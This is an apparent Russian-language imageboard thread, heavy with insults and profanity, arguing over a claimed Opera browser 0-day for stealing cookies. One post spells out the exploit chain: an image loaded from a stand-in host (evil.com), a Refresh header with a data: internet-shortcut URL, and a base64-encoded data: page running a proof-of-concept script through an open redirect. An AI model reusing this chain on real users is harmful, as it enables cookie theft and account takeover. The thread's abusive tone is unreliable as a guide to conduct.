У любого пользователя Оперы можно украсть
печеньки с любого сайта, где можно вставить
картинку или вставить ссылку, причем юзер
ничего не заметит и ему ничего не нужно
будет делать.
Enjoy, операблядки! Уже сейчас на куче сайтов с
рекламой используется этот метод. Проще
говоря, у вас могут спиздить куки от любого
произвольного сайта в любом произвольном
месте Интернета.
Школьник сам не понял, но на колчан запостил.
Но я нигде кроме как 1–2 сайтов с хорошей репутацией и колчана не сижу. Похуй.
Ну давай, укради у меня куки.
Школьничек забыл упомянуть, что по ссылке нужно будет перейти.
Да и дата-урл ссылку вставить можно прямо скажем не везде.
>>1450510
А можно просто вставить картинку svg.
И ты ничего не заметишь.
>>1450513
И где ты можешь вставить свг?
Школьник кукарекает, но куки украсть не может.
>>1450514
На любом СЕО-говне, куда каждый день валится куча трафика.
И напиздить тем самым куки от контакта, например.
Или киви-кошельков.
Или еще чего.
>>1450520
Операводы в такие места не ходят.
>>1450522
Да вот беда — они обычно открываются сами.
Например на нульчане.
Сам попробовал бы что ли. Давай, укради у меня куки.
>>1450525
Украл.
>>1450527
Не украл. Школьник обосрался.
У меня уже установлены настройки, с которыми ничего не украсть.
Блядь, я бы сейчас не отказался от кукисов. С шоколадом или еще чем. Похуй. Жрать охота, пиздец как.
Но школьник не знает, как это делать, даже если они не установлены.
Школьник кудахчет, сидя на своем говнофоксе, к которому есть тьма приватных уязвимостей, думая, что он в полной безопасности.
Бедный няняша, одним словом.
Опера — самый секурный браузер, на самом деле.
>>1450533
Очень слабое оправдание, нет, правда.
На рутрекере, например, достаточно вставить картинку в пост и спиздить куки от рутрекера.
>>1450537
Отрицаешь очевидное.
>>1450540
Не вижу ни одного отрицания.
>>1450538
Охуеть достижение!
>>1450538
Сто процентов на уровне движка уже порезали вставку дата-урлов.
>>1450542
Мудило, обычный урл.
Жертва посещает сайт где размещена наша картинка в комментариях (или в теле новости).
<img src=«http://evil.com/evil.png» />
Когда браузер пытается загрузить evil.png, в ответ сервер возвращает следующий скрипт
Refresh: 0; url=data:application/internet-shortcut,InternetShortcut
URL=http://sfw.org.ua/engine/go.php?url=ZGF0YTp0ZXh0L2h0bWw7YmFzZTY0LFBITmpjbWx3ZEQ1aGJHVnlkQ2hrYjJOMWJXVnVkQzVrYjIxaGFXNHBQQzl6WTNKcGNIUSs=
Content-Type: image/svg+xml;
<svg xmlns=«http://www.w3.org/2000/svg» version=«1.1» />
Опера считывает адрес internet shortcut из заголовка Refresh и редиректит пользователя на
http://sfw.org.ua/engine/go.php?…
Где в параметр url передается base64_encode строка:
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
Что в свою очередь содержит:
<script>alert(document.domain)</script>
А это и есть та самая 0-day уязвимость.
У меня не сработал ни один из способов.
FAIL
>>1450543
Разберись в вопросе сначала.
>>1450538
да подавись моим аккаунтом от рутрекера
Против оперы кукарекают люди вообще безнадежно далекие.
Ну у них там и смайлики.

>>1450550 попробуй от хрома кусок.
>>1450551
Провоцируешь на добровольный защквар?
как запилите гайд — позовите, я в соседней вкладке сижу пока.
>>1450553
Чё у тебя там?
Лолд блять, форум саппорта Оперы УПАЛ от наплыва посетителей.
http://my.opera.com/…nity/forums/
>>1450555 http://www.youtube.com/watch?…
>>1450556
Да opera.com вообще через жопу уже работает.
Вот это глубокий отсос.
>>1450557
Заебись вообще. Очень круто.
Какой кошмар! Они спиздят мои куки от сосача!
>>1450610
И удалят твои посты.
Эпичный отсос рабов проприетарного красного очка.
>>1450641
Пердоликопроблемы.
>>1450505
Лол.
Плюс отсосу.
«Опера — единственный браузер» (Очкопитух)
Ссылка в оп-посте не открывается, как всегда обсер лисоблядков и прочих хромогов на ровном месте.
(← + Сtrl) вернуться назадк новым сообщениям (Сtrl + →)